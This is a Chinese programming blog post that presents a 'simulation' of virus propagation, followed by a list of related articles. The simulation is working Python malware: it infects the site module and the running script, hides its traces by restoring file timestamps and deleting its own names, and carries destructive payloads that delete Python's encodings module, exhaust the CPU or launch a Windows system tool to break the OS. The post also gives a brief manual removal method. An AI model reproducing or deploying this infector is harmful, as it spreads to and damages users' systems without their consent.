Python 设计自我复制程序,模拟计算机病毒传播原理

已于 2025-02-04 09:42:09 修改
阅读量2w 收藏 35
点赞数 6
分类专栏: Python 文章标签: python 计算机病毒 数据安全
于 2021-01-27 12:40:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qfcy_/article/details/112737610
版权
本文介绍了一个使用Python设计的自我复制程序,模拟了计算机病毒的传播原理。该程序可以在不同的Python解释器间进行自我复制,并通过标记和条件判断来实现传播。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

众所周知,计算机病毒和木马传染性、破坏性强,已经给人们的生产和生活带来了巨大损失。而某些病毒,如CIH病毒,甚至有破坏BIOS和主板的能力。
本文将使用Python设计可自我复制和传播的程序,模拟计算机病毒传播的原理。

声明:本文中的代码仅供学习和参考,请勿用于非法用途!
完整源代码: python-self-replication · GitHub

目录

计算机病毒的概念

计算机病毒(Computer Virus)指编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机正常使用并且能够自我复制的一组计算机指令或程序代码。

计算机病毒具有传染性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性等性质。
计算机病毒的生命周期为:开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。

计算机病毒模拟程序

程序可在不同Python解释器之间自我复制, 类似计算机病毒传播的原理。

程序由四个部分组成 :

  • 获取程序自身代码。
  • 判断目标文件中是否已存在该程序。
  • 将代码写入目标文件末尾。
  • 其他用于破坏的代码。

step1 : 传播的部分

# mark是本程序的标记
mark="#####MyPython####"#v1.0.2
code=''
# 获取程序自身代码
with open(__file__,encoding="utf-8") as f:
    for line in f:
        if mark in line.strip():
            code=line+f.read()
# 复制自身到指定的Python脚本
def spread_to_file(file):
    import os;stat=os.stat(file)
    old_time=stat.st_atime,stat.st_mtime # 获取旧的修改时间
    # 判断是否已存在标记
    with open(file,'r',encoding='utf-8') as f:
        for line in f:
            if mark in line:return # 找到标记,则不写入
    # 判断待写入文件大小,过小则不写入
    if os.path.getsize(file)>=2048:
        # 将代码写入文件末尾
        with open(file,'a',encoding='utf-8') as f:
            f.write('\n'+code)
        os.utime(file,old_time) # 改回原来的修改时间,隐藏痕迹
# 复制自身到指定模块
def spread(mod):
    spread_to_file(__import__(mod).__file__)

try:
    spread('site')
    # 复制自身到正在运行的主程序 (sys.argv[0])
    spread_to_file(__import__("sys").argv[0])
except:pass
# 防止自身通过dir(site)被发现
del spread,spread_to_file,code,mark,f,line

程序中使用的技巧:

  1. 使用__file__获取程序文件名。
  2. 应用__import__()函数直接导入模块,避免命名空间污染。
  3. 使用标记(如: #####MyPython####) 标识本程序。
  4. 应用os.path.getsize函数获取文件大小,如果文件过小则不写入。
  5. 应用os.statos.utime隐藏修改日期的痕迹。

step2: 用于破坏的部分

import os,random,encodings
if random.randrange(1,300)==1:
	# 移除encodings模块, 使Python无法正常启动
	os.remove(encodings.__file__)

或:

import os
if random.randrange(1,30)==1:
	# 占用系统资源, 使计算机运行速度变慢
	for i in range(4): # 4为cpu线程数
		os.system('pythonw.exe -c "while True:pass"')

或:

# 更新时间:2021-7-7
import os
# 调用windows的安装程序, 破坏系统
os.system(os.path.join(os.getenv('windir'), 'system32\\oobe\\audit.exe'))

step3: 传播到pyc文件

pyc文件是由py文件编译而来的Python字节码,传播到pyc文件可使程序更不易被识别。
参见文章: Python bytecode 字节码解析与插入、修改

step4: 如何彻底清除本程序
安装并打开Everything软件,打开“搜索” => “高级搜索”菜单,在所有*.py文件的内容中查找#####MyPython####,再手动编辑找到的文件,将末尾的本程序代码删除,即可。

文章到此结束,欢迎点赞收藏

[c语言] 自我复制程序
水墨沙场
12-19 3300
/************************************************************************* > File Name: copy1.c > Author: jukay > Mail: hellojukay@163.com > Created Time: 2014年12月19日 星期五 20时51分11秒 *
python自我复制程序_Python自我
从零开始的教程世界
07-15 1304
python自我复制程序In this lesson, we will study about the usage of Python self. It is often a point of debate among experts and a topic of confusion for beginners. Let’s try to come clean for everyone. 在本课...
程序自我复制
11-27
程序能够自我复制 并且保存到随机的盘符下
自我复制程序
韩江雪de 小屋
03-21 1252
文章目录1 代码2 思想 1 代码 ```c #include <stdio.h> int main() { char *s = "#include <stdio.h>%cint main() { char *s = %c%s%c; printf( s, 10, 34, s, 34 ); return 0; }"; printf( s, 10, 34, s, 34 ); r...
python程序自我复制
cglover的专栏
09-29 2232
   # -*- coding: utf-8 -*-# 文件名:pythontik.py# from: www.pythontik.com# 功能:自我自制# mode:overwritev=open(__file__,r) # 以只读方式打开当前目录下的当前文件gointo=open(pythontik1.py,w) # 以写的方式打开当前目录下指定的文件,该文件不存在则创建之# 下
程序自我复制(c++)
明夕何夕0x00
06-06 1872
#include #include #include using namespace std; int main(void){   LPCTSTR TargetPath = _T("C:\\X.Rabbit.exe"); // 复制到的路径   TCHAR tcBuf[_MAX_PATH]; // 缓冲区   // 取自己程序程序名   ::GetModuleFileName(NULL, tc
Python 写了个新型冠状病毒疫情传播模拟程序
09-17
其中,计算机模拟成为了一个重要的工具,它可以帮助研究人员、公共卫生专家乃至普通大众更好地理解病毒传播的机理及其控制策略的效果。本篇介绍的Python程序即为一种模拟新型冠状病毒疫情传播的方式。 #### 程序...
Python大作业-基于python实现病毒人群中传播模型源码(模拟人员分布、活动、感染、传播过程等).zip
最新发布
10-09
Python大作业-基于Matplotlib和python实现病毒人群中传播模型源码(模拟人员分布、活动、感染、传播过程等).zip 【1】项目代码完整且功能都验证ok,确保稳定可靠运行后才上传。欢迎下载使用!在使用过程中,如有问题...
Python实现的简易新冠病毒传播模拟
通过以上知识点的分析,可以看出VeryOwnCoronaSymulation-作为一款Python编写的病毒传播模拟程序,需要运用到编程语言的基础知识、面向对象编程、数学建模、数据分析和可视化等多个IT领域知识。这些知识点不仅有助于...
毕业设计:基于Python的病毒数据爬取系统.zip
10-16
【标题】"基于Python的病毒数据爬取系统"是一个典型的计算机科学毕业设计项目,它涉及到的主要知识点包括Python编程、网络爬虫技术以及数据分析。这个项目旨在利用Python开发一个能够自动从互联网上抓取病毒数据的...
使用Python创建了一个病毒在人群中传播的计算机仿真模型.zip
06-25
在这个项目中,“使用Python创建了一个病毒在人群中传播的计算机仿真模型”旨在通过编程来模拟现实世界中传染病的扩散过程。Python因其丰富的库支持和易读性而成为进行此类任务的理想选择。 首先,我们要理解传染病...
Python 设计自我复制程序
08-09
这是使用Python设计的可自我复制程序, 支持修改py, pyc等可执行python文件。 程序将自身的代码插入目标代码中, 运行目标代码时, 自身代码会随之运行, 达到自我复制的目的。
c语言能自我复制程序,[c语言] 自我复制程序
weixin_39887531的博客
05-17 509
/*************************************************************************> File Name: copy1.c> Author: jukay> Mail: hellojukay@163.com> Created Time: 2014年12月19日 星期五 20时51分11秒************...
Python文件自我复制感染病毒及其查杀解毒
Little_Bro的博客
07-20 2914
病毒功能: 针对当前文件夹下所有的.py文件以及所有下属文件夹内的所有.py文件进行病毒感染,将病毒代码复制到文件的原代码之前,同时病毒操作者还可以对病毒复制感染的次数进行设置。
python病毒扫描器_通过python构建集中式的病毒扫描机制
weixin_39937447的博客
12-20 421
Clam AntiVirus(Clam AV)是一个免费而且开放源码的防毒软件,软件与病毒库的更新由开源社区免费发布,目前ClamdAV主要为Linux、Uinux系统提供病毒扫描查杀pyClamad是一个python的第三方模块,可让python直接使用ClamAV病毒扫描守护进程clamd来实现一个高效的病毒检测功能。一、实现集中式的病毒扫描1、客户端(病毒扫描源)安装clamavp clam...
计算机中的自我复制
KQe397773106的博客
05-27 414
书名:复杂(第一推动丛书·综合系列)作者:梅拉妮·米歇尔译者:唐璐出版社:湖南科学技术出版社出版时间:2018-01-01。
一个具自我复制功能的程序
简简单单
12-21 3064
/******************************************************************* * *此程序是一具自我复制程序,它将以自己为模板,复制许多不同名字的程序, *这此复制的程序同样都有自我复制的能力类似于病毒,但有不是病毒,因为 *没有破坏性,程序中也没有具有破坏性的代码。 * *程序在turboc2.0中编绎通过 * *编程:郑绍辉   20
Code - Windows程序自我复制
chijiaozhao5384的博客
11-27 243
程序,本质是一个二进制文件,其中包含了平台相关的计算机指令。一个在运行中的程序,被加载到内存中,它在存储介质中的可执行文件通常是不可被修改,但是可以访问其中的内容。由此可以通过拷贝其中的数据,再创建一份一样的二进制文件即可复制一个可执行的文件。 demo中的代码省略部分异常处理 int...
python文件感染python文件(自我复制)初探
m0_66672047的博客
03-25 1029
代码如下 #python infector import os def infect(filename,top_distance,self_length,blank_line=100): infector = '' self_check_string = 'def infect(filename,top_distance,self_length,blank_line=100):\n' with open(filename,'r',encoding='utf-8') as tar
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qfcy_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值